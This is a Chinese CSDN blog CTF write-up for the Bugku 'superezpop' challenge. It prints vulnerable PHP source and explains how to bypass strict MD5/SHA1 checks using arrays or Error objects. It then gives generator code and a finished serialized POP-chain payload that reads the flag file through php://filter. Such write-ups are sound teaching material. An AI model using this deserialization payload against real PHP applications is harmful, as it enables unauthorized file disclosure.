CTF的superezpop题目详解,以及对MD5和SH1绕过的学习

最新推荐文章于 2024-05-30 11:53:48 发布
最新推荐文章于 2024-05-30 11:53:48 发布
阅读量613 收藏 7
点赞数 18
文章标签: mssql web安全 php 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tutuwanc/article/details/134832856
版权

题目来源

BUGku

题目内容

<?php
error_reporting(0);
 
class User{
    public $username;
    public $password;
    public $variable;
    public $a;
    
    public function __construct()
    {
        $this->username = "user";
        $this->password = "user";
    }


    public function __wakeup(){
        if( ($this->username != $this->password) && (md5($this->username) === md5($this->password)) && (sha1($this->username)=== sha1($this->password)) ){
            echo "wuhu!";
            return $this->variable->xxx;
        }else{
            die("o^o");
        }
    }
}

class Login{
    public $point;
    
    public function __get($key){
        $func = $this->point;
        return $func();
    }    

}

class Read{
    public $filename;
    
    public function __invoke(){
        echo file_get_contents($this->filename.".php");
    }
}
 
if(isset($_GET['x'])){
    unserialize($_GET['x']);
}else{
    highlight_file(__FILE__);
}
?>

整体思路

题目内容是这样
我们先来看思路,接收到x变量的是序列化的内容,反序列化之后,会调用类的__wakeup 方法,我们需要从创建User的类,来进入if循环内,并且通过

($this->username != $this->password) && (md5($this->username) === 
md5($this->password)) && (sha1($this->username)=== sha1($this->password))

该对比,我们可以看到MD5和SHA1是强比较,具体内容可以参考http://t.csdnimg.cn/g8W1T该博客

我们有两种方法绕过MD5和SHA1的比较

第一种:创建两个数组,并赋值给username和password,因为md5和SHA1对数组识别会有漏洞

$user = new User();
$a=array("1");
$b=array("2");
$user->username = $a;
$user->password = $b;

第二种:用Error错误绕过

$a = new Error($str, 1);
$b = new Error($str, 2);
$user->username = $a;
$user->password = $b;

//其中错误的输出为Error in /box/script.php:53
//Stack trace:
//#0 {main}

当我们绕过MD5之后考虑如果得到flag
我们可以发现
__get($key)函数和__invoke()函数

__get()函数:读取不可访问属性的值时,__get() 会被调用。也就是当想要获取一个类不存在的私有属性时会执行get函数
__invoke()函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。

所以我们需要先调用get函数,在从get函数中调用invoke函数
所以接下来的代码为:

$login = new Login();
$read= new Read();
$read->filename="php://filter/read=convert.base64-encode/resource=flag";
$login->point=$read;
$user->variable= $login;
echo serialize($user);

结果如下

O:4:"User":4:{s:8:"username";a:1:{i:0;s:1:"1";}s:8:"password";a:1:{i:0;s:1:"2";}s:8:"variable";O:5:"Login":1:{s:5:"point";O:4:"Read":1:{s:8:"filename";s:53:"php://filter/read=convert.base64-encode/resource=flag";}}s:1:"a";N;}

成功拿到flag,
在这里插入图片描述
NUAACTF{y0u_c4n_re3lly_l0g1N!}

tutuwanc
关注
  • 18
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
md5.zip_ctfmd5题_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
md5解密,ctf中经常用到的md5解密
CTFPHP MD5函数0E绕过漏洞
06-01 1万+
CTFPHP MD5函数0E绕过漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.1 8:43 背景 昨天参加了一场CTF线上赛,面对行业内的安全强队,比赛成绩相差巨大。通过这次比赛,找到了差距,找到了不足,更增长了知识。子曰:“学而不思则罔,思而不学则殆。”计划将经后每次比赛,解题过程中的困惑、思路、整理后分享出来,以达起到巩固知识,也便于帮助有需要的人。因个人能力所限,文中难免会有错误,不妥之处还请批评指正。 赛题源码 ...
【超全总结】CTF常见的MD5绕过漏洞和应对方法
M0nH1N的博客
08-06 5378
$str1 = $_GET['str1'];$str2 = $_GET['str2'];if (md5($str1) == md5($str2)){die('OK'); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串的MD5值为0e开头,这里记录一下 QNKCDZO 240610708 s878926199a s155964671a s2145
MD5绕过 --- CTF
那酷小样的博客
10-19 7620
如:if(v1 !=v2 &amp;&amp; md5(v1) == md5(v2)):{ return true; } 绕过 根据MD5的特性,有两点漏洞 1.两个开头为0的md5值相同。 2.md5不能处理数组。 绕过: 方法1:v1,v2 找到两个开头为0的md5值,例如:v1=s878926199a&amp;&amp;v2=s155964671a 方法2:根据md5函数特性,用两个值不同但...
ctf题目php文件上传如何绕过_ctf基本的文件上传与绕过学习
weixin_42591413的博客
02-01 3009
绕过客户端校验前台脚本检测扩展名上传webs hell原理:当用户在客户端选择文件点击上传的时候,客户端还没有向服务器发送任何消息,就对本地文件进行检测来判断是否是可以上传的类型,这种方式称为前台脚本检测扩展名。绕过前台脚本检测扩展名,就是将所要上传文件的扩展名更改为符合脚本检测规则的扩展名,通过 BurpSuite 工具,截取数据包,并将数据包中文件扩展名更改回原来的,达到绕过的目的实验:打开要...
CTF_Webphp弱类型绕过md5碰撞
AFCC_的博客(Web_Dog)
08-09 3506
0x00 前言 md5碰撞只是一种掌握php弱类型的方式,弱类型的内容有很多,数组、字符串比较等等,但不论以哪种方式考,涉及的知识点都是相通的,希望通过对基础知识的分享与大家一同学习进步。 0x01 什么是md5MD5,即消息摘要算法(英语:MD5 Message-Digest Algorithm)。是一种被广泛使用的密码散列函数,将数据(如一段文字)运算变为另一固定长度值,是散列算法的基础原理,可以产生出一个128位(16字节)的散列值(hash value),用于确保信息传输完整一致。 显然12
CTFPHP MD5绕过和序列化漏洞
06-25 1371
CTFPHP MD5绕过和序列化漏洞 作者:高玉涵 博客:blog.csdn.net/cg_i 时间:2021.6.25 9:51 题目复现Docker环境: https://github.com/glzjin/buusec_2019_code_review_1 生命因为有限所以宝贵;因为有限,所以才要不懈努力。 ——名侦探柯南 源码 第一关:MD5绕过漏洞 CTF就是一个“套娃”游戏。首先我们把注意力集中到if(md5($_POST[‘md51’]) == ...
MD5绕过
LYJ20010728的博客
05-14 7075
MD5绕过MD5弱类型比较方法一:数组绕过方法二:科学计数法绕过MD5判断扩展构造MD5强类型比较方法一:数组绕过方法二:使用md5加密后两个完全相等的两个字符串绕过哈希长度扩展攻击 MD5弱类型比较 <?php highlight_file(__FILE__); error_reporting(0); $flag = "flag{H3rmesk1t_is_a_loser}"; $val1 = $_GET['val1']; $val2 = $_GET['val2']; if (isset($_GET
ctfMD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 4559
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
总结ctfMD5 绕过的一些思路
热门推荐
y0un9er
10-02 1万+
总结ctfMD5 绕过的一些思路,包括在PHP弱类型比较中 0e 、数组、MD5后的值等于原值,以及强比较的MD5碰撞
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
CTF之常见密码学攻击手法和实现.md
10-24
CTF-crypto-入门-密码学
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
工匠杯-CTF题目+exp+解题思路)
04-01
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
PHP特性之CTF中常见的PHP绕过
Welcome To Myon'Blog !
07-18 5685
一、关于md5()和sha1()的常见绕过 1、使用数组绕过 2、 使用特殊字符串绕过 二、strcmp绕过 三、switch绕过 四、intval绕过
一口气说出4种主流数据库ID自增长,面试官懵了
m0_54866636的博客
06-21 402
数据库自增长ID,不需要设置和绑定 ID 数据列。在往数据库中插入数据的时候,数据库会自动为每条数据生成一个递增的ID,本文做了详细的说明。如下图: 实例??? 第一步:登陆PG ??? 第二步:创建表 ??? 第三步:现在往表中插入几条记录??? 查看 COMPANY 表的记录如下 大家点赞、收藏、关注、评论啦 ???微信公众号???...
SQL教程之 5 个必须知道的用于操作日期的 SQL 函数
iCloudEnd的博客
06-23 508
如果你在我得到第一份工作之前问到数据科学家最重要的技能,我的答案肯定是 Python。毫无疑问!我现在是一名数据科学家,如果你问我同样的问题,我的答案仍然是 Python。不过,我有第二个想法。让我三思而后行的是 SQLSQL 是数据科学家必备的技能。它主要用于查询关系数据库,但它能够执行更多。SQL 配备了如此多的功能,使其成为高效的数据分析和操作工具。在本文中,我们将介绍 5 个用于操作日期的 SQL 函数。在处理涉及基于日期或时间的信息的数据时,它们会派上用场。注意: SQL 被许多关系数据库管理系
Gartner发布电信运营商应对持续变化的网络安全环境指南:现代云安全与网络安全的五大核心挑战
最新发布
lurenjia404的博客
05-30 519
所有组织的云和网络都面临着高级威胁。作为网络安全的关键参与者,电信运营商的 CIO 需要了解行业面临的挑战,并了解应采用哪些解决方案来实现方法的现代化。
如何处理网安发出的网络安全监督检查限期整改通知
联蔚盘云的博客
05-27 398
近期,很多客户都收到了网安发出的限期整改通知。大家都比较关心的问题是,如何应对处理这些限期整改通知。后续是否有其他的影响,需要如何做进一步的优化整改和调整。今天就这些问题给大家做一些分享。
md5和sha1相等 ctf
08-06
鉴于引用中提到了md5的相性,以及引用中提到了使用弱类型进行绕过的方法,我们可以得出结论:在CTF比赛中,可能存在一种情况,即当md5和sha1的比较结果为0时,可以得到flag。 然而,需要注意的是,md5和sha1是两种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值